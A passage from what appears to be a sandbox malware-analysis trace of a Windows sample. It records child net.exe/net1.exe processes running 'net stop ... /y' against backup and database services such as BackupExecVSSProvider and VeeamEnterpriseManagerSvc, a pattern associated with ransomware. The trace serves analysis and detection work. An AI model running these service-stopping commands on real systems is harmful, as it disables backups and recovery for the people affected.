lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nK", lpUsedDefaultChar=0x0) returned 2 [0212.249] WriteFile (in: hFile=0x26c, lpBuffer=0x4b6238, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x27f798, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x27f798, lpOverlapped=0x0) returned 0 [0212.249] LocalFree (hMem=0x4b6238) returned 0x0 [0212.249] NetApiBufferFree (Buffer=0x4b1c78) returned 0x0 [0212.250] NetApiBufferFree (Buffer=0x4b1c90) returned 0x0 [0212.250] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLSafeOLRService /y" [0212.250] exit (_Code=2) Process: id = "306" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x4a9c1000" os_pid = "0xa24" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop BackupExecVSSProvider /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 479 os_tid = 0xa08 Process: id = "307" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x4e5d8000" os_pid = "0x974" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "306" os_parent_pid = "0xa24" cmd_line = "C:\\Windows\\system32\\net1 stop BackupExecVSSProvider /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 480 os_tid = 0x898 [0212.405] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30fbfc | out: lpSystemTimeAsFileTime=0x30fbfc*(dwLowDateTime=0x47caeac0, dwHighDateTime=0x1d57a87)) [0212.405] GetCurrentProcessId () returned 0x974 [0212.405] GetCurrentThreadId () returned 0x898 [0212.405] GetTickCount () returned 0x116eacc [0212.405] QueryPerformanceCounter (in: lpPerformanceCount=0x30fbf4 | out: lpPerformanceCount=0x30fbf4*=33268952660) returned 1 [0212.405] GetModuleHandleA (lpModuleName=0x0) returned 0x650000 [0212.405] __set_app_type (_Type=0x1) [0212.405] __p__fmode () returned 0x74eb31f4 [0212.405] __p__commode () returned 0x74eb31fc [0212.405] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x65ffe6) returned 0x0 [0212.406] __getmainargs (in: _Argc=0x669064, _Argv=0x66906c, _Env=0x669068, _DoWildCard=0, _StartInfo=0x669024 | out: _Argc=0x669064, _Argv=0x66906c, _Env=0x669068) returned 0 [0212.406] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.406] GetConsoleOutputCP () returned 0x1b5 [0212.406] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x669080 | out: lpCPInfo=0x669080) returned 1 [0212.406] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.409] sprintf_s (in: _DstBuf=0x30fbb4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0212.409] setlocale (category=0, locale=".437") returned="English_United States.437" [0212.411] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0212.411] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0212.411] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecVSSProvider /y" [0212.411] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x30f980, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0212.411] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7e) returned 0x793c20 [0212.411] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0212.411] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fb84 | out: Buffer=0x30fb84*=0x791c80) returned 0x0 [0212.411] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x30fb84 | out: Buffer=0x30fb84*=0x791c98) returned 0x0 [0212.411] _fileno (_File=0x74eb2900) returned -2 [0212.411] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0212.412] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0212.412] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0212.412] _wcsicmp (_String1="config", _String2="stop") returned -16 [0212.412] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0212.412] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0212.412] _wcsicmp (_String1="file", _String2="stop") returned -13 [0212.412] _wcsicmp (_String1="files", _String2="stop") returned -13 [0212.412] _wcsicmp (_String1="group", _String2="stop") returned -12 [0212.412] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0212.412] _wcsicmp (_String1="help", _String2="stop") returned -11 [0212.412] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0212.412] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0212.412] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0212.412] _wcsicmp (_String1="session", _String2="stop") returned -15 [0212.412] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0212.412] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0212.412] _wcsicmp (_String1="share", _String2="stop") returned -12 [0212.412] _wcsicmp (_String1="start", _String2="stop") returned -14 [0212.412] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0212.412] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0212.412] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0212.412] _wcsicmp (_String1="accounts", _String2="BackupExecVSSProvider") returned -1 [0212.412] _wcsicmp (_String1="computer", _String2="BackupExecVSSProvider") returned 1 [0212.412] _wcsicmp (_String1="config", _String2="BackupExecVSSProvider") returned 1 [0212.412] _wcsicmp (_String1="continue", _String2="BackupExecVSSProvider") returned 1 [0212.412] _wcsicmp (_String1="cont", _String2="BackupExecVSSProvider") returned 1 [0212.412] _wcsicmp (_String1="file", _String2="BackupExecVSSProvider") returned 4 [0212.412] _wcsicmp (_String1="files", _String2="BackupExecVSSProvider") returned 4 [0212.412] _wcsicmp (_String1="group", _String2="BackupExecVSSProvider") returned 5 [0212.412] _wcsicmp (_String1="groups", _String2="BackupExecVSSProvider") returned 5 [0212.412] _wcsicmp (_String1="help", _String2="BackupExecVSSProvider") returned 6 [0212.412] _wcsicmp (_String1="helpmsg", _String2="BackupExecVSSProvider") returned 6 [0212.412] _wcsicmp (_String1="localgroup", _String2="BackupExecVSSProvider") returned 10 [0212.412] _wcsicmp (_String1="pause", _String2="BackupExecVSSProvider") returned 14 [0212.412] _wcsicmp (_String1="session", _String2="BackupExecVSSProvider") returned 17 [0212.412] _wcsicmp (_String1="sessions", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="sess", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="share", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="start", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="stats", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="statistics", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="stop", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="time", _String2="BackupExecVSSProvider") returned 18 [0212.413] _wcsicmp (_String1="user", _String2="BackupExecVSSProvider") returned 19 [0212.413] _wcsicmp (_String1="users", _String2="BackupExecVSSProvider") returned 19 [0212.413] _wcsicmp (_String1="msg", _String2="BackupExecVSSProvider") returned 11 [0212.413] _wcsicmp (_String1="messenger", _String2="BackupExecVSSProvider") returned 11 [0212.413] _wcsicmp (_String1="receiver", _String2="BackupExecVSSProvider") returned 16 [0212.413] _wcsicmp (_String1="rcv", _String2="BackupExecVSSProvider") returned 16 [0212.413] _wcsicmp (_String1="netpopup", _String2="BackupExecVSSProvider") returned 12 [0212.413] _wcsicmp (_String1="redirector", _String2="BackupExecVSSProvider") returned 16 [0212.413] _wcsicmp (_String1="redir", _String2="BackupExecVSSProvider") returned 16 [0212.413] _wcsicmp (_String1="rdr", _String2="BackupExecVSSProvider") returned 16 [0212.413] _wcsicmp (_String1="workstation", _String2="BackupExecVSSProvider") returned 21 [0212.413] _wcsicmp (_String1="work", _String2="BackupExecVSSProvider") returned 21 [0212.413] _wcsicmp (_String1="wksta", _String2="BackupExecVSSProvider") returned 21 [0212.413] _wcsicmp (_String1="prdr", _String2="BackupExecVSSProvider") returned 14 [0212.413] _wcsicmp (_String1="devrdr", _String2="BackupExecVSSProvider") returned 2 [0212.413] _wcsicmp (_String1="lanmanworkstation", _String2="BackupExecVSSProvider") returned 10 [0212.413] _wcsicmp (_String1="server", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="svr", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="srv", _String2="BackupExecVSSProvider") returned 17 [0212.413] _wcsicmp (_String1="lanmanserver", _String2="BackupExecVSSProvider") returned 10 [0212.413] _wcsicmp (_String1="alerter", _String2="BackupExecVSSProvider") returned -1 [0212.413] _wcsicmp (_String1="netlogon", _String2="BackupExecVSSProvider") returned 12 [0212.413] _wcsupr (in: _String="BackupExecVSSProvider" | out: _String="BACKUPEXECVSSPROVIDER") returned="BACKUPEXECVSSPROVIDER" [0212.414] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7954f0 [0212.416] GetServiceKeyNameW (in: hSCManager=0x7954f0, lpDisplayName="BACKUPEXECVSSPROVIDER", lpServiceName=0x66aaf0, lpcchBuffer=0x30fb20 | out: lpServiceName="", lpcchBuffer=0x30fb20) returned 0 [0212.417] _wcsicmp (_String1="msg", _String2="BACKUPEXECVSSPROVIDER") returned 11 [0212.417] _wcsicmp (_String1="messenger", _String2="BACKUPEXECVSSPROVIDER") returned 11 [0212.417] _wcsicmp (_String1="receiver", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0212.417] _wcsicmp (_String1="rcv", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0212.417] _wcsicmp (_String1="redirector", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0212.417] _wcsicmp (_String1="redir", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0212.417] _wcsicmp (_String1="rdr", _String2="BACKUPEXECVSSPROVIDER") returned 16 [0212.417] _wcsicmp (_String1="workstation", _String2="BACKUPEXECVSSPROVIDER") returned 21 [0212.417] _wcsicmp (_String1="work", _String2="BACKUPEXECVSSPROVIDER") returned 21 [0212.417] _wcsicmp (_String1="wksta", _String2="BACKUPEXECVSSPROVIDER") returned 21 [0212.417] _wcsicmp (_String1="prdr", _String2="BACKUPEXECVSSPROVIDER") returned 14 [0212.417] _wcsicmp (_String1="devrdr", _String2="BACKUPEXECVSSPROVIDER") returned 2 [0212.417] _wcsicmp (_String1="lanmanworkstation", _String2="BACKUPEXECVSSPROVIDER") returned 10 [0212.417] _wcsicmp (_String1="server", _String2="BACKUPEXECVSSPROVIDER") returned 17 [0212.417] _wcsicmp (_String1="svr", _String2="BACKUPEXECVSSPROVIDER") returned 17 [0212.417] _wcsicmp (_String1="srv", _String2="BACKUPEXECVSSPROVIDER") returned 17 [0212.417] _wcsicmp (_String1="lanmanserver", _String2="BACKUPEXECVSSPROVIDER") returned 10 [0212.417] _wcsicmp (_String1="alerter", _String2="BACKUPEXECVSSPROVIDER") returned -1 [0212.417] _wcsicmp (_String1="netlogon", _String2="BACKUPEXECVSSPROVIDER") returned 12 [0212.417] NetServiceControl (in: servername=0x0, service="BACKUPEXECVSSPROVIDER", opcode=0x0, arg=0x0, bufptr=0x30fb1c | out: bufptr=0x30fb1c) returned 0x889 [0212.418] wcscpy_s (in: _Destination=0x66a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0212.418] LoadLibraryW (lpLibFileName="NETMSG") returned 0x74a10000 [0212.419] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x74a10000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x66b338, nSize=0x800, Arguments=0x669dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0212.420] GetFileType (hFile=0x26c) returned 0x3 [0212.420] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x794020 [0212.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x794020, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\nx", lpUsedDefaultChar=0x0) returned 30 [0212.420] WriteFile (in: hFile=0x26c, lpBuffer=0x794020, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x30fa5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa5c, lpOverlapped=0x0) returned 0 [0212.420] LocalFree (hMem=0x794020) returned 0x0 [0212.420] GetFileType (hFile=0x26c) returned 0x3 [0212.420] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7962c8 [0212.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7962c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ny", lpUsedDefaultChar=0x0) returned 2 [0212.420] WriteFile (in: hFile=0x26c, lpBuffer=0x7962c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30fa5c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa5c, lpOverlapped=0x0) returned 0 [0212.420] LocalFree (hMem=0x7962c8) returned 0x0 [0212.420] _ultow (in: _Dest=0x889, _Radix=3209868 | out: _Dest=0x889) returned="2185" [0212.420] FormatMessageW (in: dwFlags=0x2800, lpSource=0x74a10000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x66b338, nSize=0x800, Arguments=0x669dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0212.420] GetFileType (hFile=0x26c) returned 0x3 [0212.420] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7962c8 [0212.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7962c8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0212.420] WriteFile (in: hFile=0x26c, lpBuffer=0x7962c8, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x30fa68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa68, lpOverlapped=0x0) returned 0 [0212.420] LocalFree (hMem=0x7962c8) returned 0x0 [0212.420] GetFileType (hFile=0x26c) returned 0x3 [0212.420] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7962c8 [0212.420] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7962c8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\ny", lpUsedDefaultChar=0x0) returned 2 [0212.421] WriteFile (in: hFile=0x26c, lpBuffer=0x7962c8, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x30fa68, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x30fa68, lpOverlapped=0x0) returned 0 [0212.421] LocalFree (hMem=0x7962c8) returned 0x0 [0212.421] NetApiBufferFree (Buffer=0x791c80) returned 0x0 [0212.421] NetApiBufferFree (Buffer=0x791c98) returned 0x0 [0212.421] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop BackupExecVSSProvider /y" [0212.421] exit (_Code=2) Process: id = "308" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x62ec6000" os_pid = "0x8bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop VeeamEnterpriseManagerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 481 os_tid = 0xa30 Process: id = "309" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x68c28000" os_pid = "0xa70" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "308" os_parent_pid = "0x8bc" cmd_line = "C:\\Windows\\system32\\net1 stop VeeamEnterpriseManagerSvc /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 482 os_tid = 0xa1c [0212.559] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x29f9b4 | out: lpSystemTimeAsFileTime=0x29f9b4*(dwLowDateTime=0x47e2b880, dwHighDateTime=0x1d57a87)) [0212.559] GetCurrentProcessId () returned 0xa70 [0212.559] GetCurrentThreadId () returned 0xa1c [0212.559] GetTickCount () returned 0x116eb68 [0212.559] QueryPerformanceCounter (in: lpPerformanceCount=0x29f9ac | out: lpPerformanceCount=0x29f9ac*=33284346207) returned 1 [0212.559] GetModuleHandleA (lpModuleName=0x0) returned 0xb30000 [0212.559] __set_app_type (_Type=0x1) [0212.559] __p__fmode () returned 0x74eb31f4 [0212.559] __p__commode () returned 0x74eb31fc [0212.559] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xb3ffe6) returned 0x0 [0212.560] __getmainargs (in: _Argc=0xb49064, _Argv=0xb4906c, _Env=0xb49068, _DoWildCard=0, _StartInfo=0xb49024 | out: _Argc=0xb49064, _Argv=0xb4906c, _Env=0xb49068) returned 0 [0212.560] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0212.560] GetConsoleOutputCP () returned 0x1b5 [0212.560] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xb49080 | out: lpCPInfo=0xb49080) returned 1 [0212.560] SetThreadUILanguage (LangId=0x0) returned 0x409 [0212.563] sprintf_s (in: _DstBuf=0x29f96c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0212.563] setlocale (category=0, locale=".437") returned="English_United States.437" [0212.565] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0212.565] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0212.565] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VeeamEnterpriseManagerSvc /y" [0212.565] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x29f738, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0212.565] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x86) returned 0x574bf8 [0212.565] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0212.565] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29f93c | out: Buffer=0x29f93c*=0x571c90) returned 0x0 [0212.566] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x29f93c | out: Buffer=0x29f93c*=0x571ca8) returned 0x0 [0212.566] _fileno (_File=0x74eb2900) returned -2 [0212.566] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0212.566] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0212.566] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0212.566] _wcsicmp (_String1="config", _String2="stop") returned -16 [0212.566] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0212.566] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0212.566] _wcsicmp (_String1="file", _String2="stop") returned -13 [0212.566] _wcsicmp (_String1="files", _String2="stop") returned -13 [0212.566] _wcsicmp (_String1="group", _String2="stop") returned -12 [0212.566] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0212.566] _wcsicmp (_String1="help", _String2="stop") returned -11 [0212.566] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0212.566] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0212.566] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0212.566] _wcsicmp (_String1="session", _String2="stop") returned -15 [0212.566] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0212.566] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0212.566] _wcsicmp (_String1="share", _String2="stop") returned -12 [0212.566] _wcsicmp (_String1="start", _String2="stop") returned -14 [0212.566] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0212.566] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0212.566] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0212.566] _wcsicmp (_String1="accounts", _String2="VeeamEnterpriseManagerSvc") returned -21 [0212.566] _wcsicmp (_String1="computer", _String2="VeeamEnterpriseManagerSvc") returned -19 [0212.566] _wcsicmp (_String1="config", _String2="VeeamEnterpriseManagerSvc") returned -19 [0212.566] _wcsicmp (_String1="continue", _String2="VeeamEnterpriseManagerSvc") returned -19 [0212.566] _wcsicmp (_String1="cont", _String2="VeeamEnterpriseManagerSvc") returned -19 [0212.566] _wcsicmp (_String1="file", _String2="VeeamEnterpriseManagerSvc") returned -16 [0212.566] _wcsicmp (_String1="files", _String2="VeeamEnterpriseManagerSvc") returned -16 [0212.566] _wcsicmp (_String1="group", _String2="VeeamEnterpriseManagerSvc") returned -15 [0212.566] _wcsicmp (_String1="groups", _String2="VeeamEnterpriseManagerSvc") returned -15 [0212.566] _wcsicmp (_String1="help", _String2="VeeamEnterpriseManagerSvc") returned -14 [0212.566] _wcsicmp (_String1="helpmsg", _String2="VeeamEnterpriseManagerSvc") returned -14 [0212.567] _wcsicmp (_String1="localgroup", _String2="VeeamEnterpriseManagerSvc") returned -10 [0212.567] _wcsicmp (_String1="pause", _String2="VeeamEnterpriseManagerSvc") returned -6 [0212.567] _wcsicmp (_String1="session", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="sessions", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="sess", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="share", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="start", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="stats", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="statistics", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="stop", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="time", _String2="VeeamEnterpriseManagerSvc") returned -2 [0212.567] _wcsicmp (_String1="user", _String2="VeeamEnterpriseManagerSvc") returned -1 [0212.567] _wcsicmp (_String1="users", _String2="VeeamEnterpriseManagerSvc") returned -1 [0212.567] _wcsicmp (_String1="msg", _String2="VeeamEnterpriseManagerSvc") returned -9 [0212.567] _wcsicmp (_String1="messenger", _String2="VeeamEnterpriseManagerSvc") returned -9 [0212.567] _wcsicmp (_String1="receiver", _String2="VeeamEnterpriseManagerSvc") returned -4 [0212.567] _wcsicmp (_String1="rcv", _String2="VeeamEnterpriseManagerSvc") returned -4 [0212.567] _wcsicmp (_String1="netpopup", _String2="VeeamEnterpriseManagerSvc") returned -8 [0212.567] _wcsicmp (_String1="redirector", _String2="VeeamEnterpriseManagerSvc") returned -4 [0212.567] _wcsicmp (_String1="redir", _String2="VeeamEnterpriseManagerSvc") returned -4 [0212.567] _wcsicmp (_String1="rdr", _String2="VeeamEnterpriseManagerSvc") returned -4 [0212.567] _wcsicmp (_String1="workstation", _String2="VeeamEnterpriseManagerSvc") returned 1 [0212.567] _wcsicmp (_String1="work", _String2="VeeamEnterpriseManagerSvc") returned 1 [0212.567] _wcsicmp (_String1="wksta", _String2="VeeamEnterpriseManagerSvc") returned 1 [0212.567] _wcsicmp (_String1="prdr", _String2="VeeamEnterpriseManagerSvc") returned -6 [0212.567] _wcsicmp (_String1="devrdr", _String2="VeeamEnterpriseManagerSvc") returned -18 [0212.567] _wcsicmp (_String1="lanmanworkstation", _String2="VeeamEnterpriseManagerSvc") returned -10 [0212.567] _wcsicmp (_String1="server", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="svr", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="srv", _String2="VeeamEnterpriseManagerSvc") returned -3 [0212.567] _wcsicmp (_String1="lanmanserver", _String2="VeeamEnterpriseManagerSvc") returned -10 [0212.567] _wcsicmp (_String1="alerter", _String2="VeeamEnterpriseManagerSvc") returned -21 [0212.567] _wcsicmp (_String1="netlogon", _String2="VeeamEnterpriseManagerSvc") returned -8 [0212.568] _wcsupr (in: _String="VeeamEnterpriseManagerSvc" | out: _String="VEEAMENTERPRISEMANAGERSVC") returned="VEEAMENTERPRISEMANAGERSVC" [0212.568] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x5754d0 [0212.570] GetServiceKeyNameW (in: hSCManager=0x5754d0, lpDisplayName="VEEAMENTERPRISEMANAGERSVC", lpServiceName=0xb4aaf0, lpcchBuffer=0x29f8d8 | out: lpServiceName="", lpcchBuffer=0x29f8d8) returned 0 [0212.571] _wcsicmp (_String1="msg", _String2="VEEAMENTERPRISEMANAGERSVC") returned -9 [0212.571] _wcsicmp (_String1="messenger", _String2="VEEAMENTERPRISEMANAGERSVC") returned -9 [0212.571] _wcsicmp (_String1="receiver", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0212.571] _wcsicmp (_String1="rcv", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0212.571] _wcsicmp (_String1="redirector", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0212.571] _wcsicmp (_String1="redir", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0212.571] _wcsicmp (_String1="rdr", _String2="VEEAMENTERPRISEMANAGERSVC") returned -4 [0212.571] _wcsicmp (_String1="workstation", _String2="VEEAMENTERPRISEMANAGERSVC") returned 1 [0212.571] _wcsicmp (_String1="work", _String2="VEEAMENTERPRISEMANAGERSVC") returned 1 [0212.571] _wcsicmp (_String1="wksta", _String2="VEEAMENTERPRISEMANAGERSVC") returned 1 [0212.571] _wcsicmp (_String1="prdr", _String2="VEEAMENTERPRISEMANAGERSVC") returned -6 [0212.571] _wcsicmp (_String1="devrdr", _String2="VEEAMENTERPRISEMANAGERSVC") returned -18 [0212.571] _wcsicmp (_String1="lanmanworkstation", _String2="VEEAMENTERPRISEMANAGERSVC") returned -10 [0212.571] _wcsicmp (_String1="server", _String2="VEEAMENTERPRISEMANAGERSVC") returned -3 [0212.571] _wcsicmp (_String1="svr", _String2="VEEAMENTERPRISEMANAGERSVC") returned -3 [0212.571] _wcsicmp (_String1="srv", _String2="VEEAMENTERPRISEMANAGERSVC") returned -3 [0212.571] _wcsicmp (_String1="lanmanserver", _String2="VEEAMENTERPRISEMANAGERSVC") returned -10 [0212.571] 